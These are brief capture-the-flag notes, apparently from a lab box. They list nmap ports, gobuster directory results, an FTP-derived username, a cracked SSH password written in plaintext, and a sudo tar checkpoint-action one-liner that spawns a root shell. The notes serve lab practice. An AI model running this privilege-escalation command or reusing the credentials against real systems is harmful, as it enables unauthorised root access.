Nmap:

Open
21 ftp
22 ssh
80 http apache

Gobuster:

/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/images               (Status: 301) [Size: 315] [--> http://10.10.130.180/images/]
/index.html           (Status: 200) [Size: 969]
/server-status        (Status: 403) [Size: 278]

From ftp:
tasks - got name lin
crack with given pass list



ssh lin RedDr4gonSynd1cat3

(root) tar

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh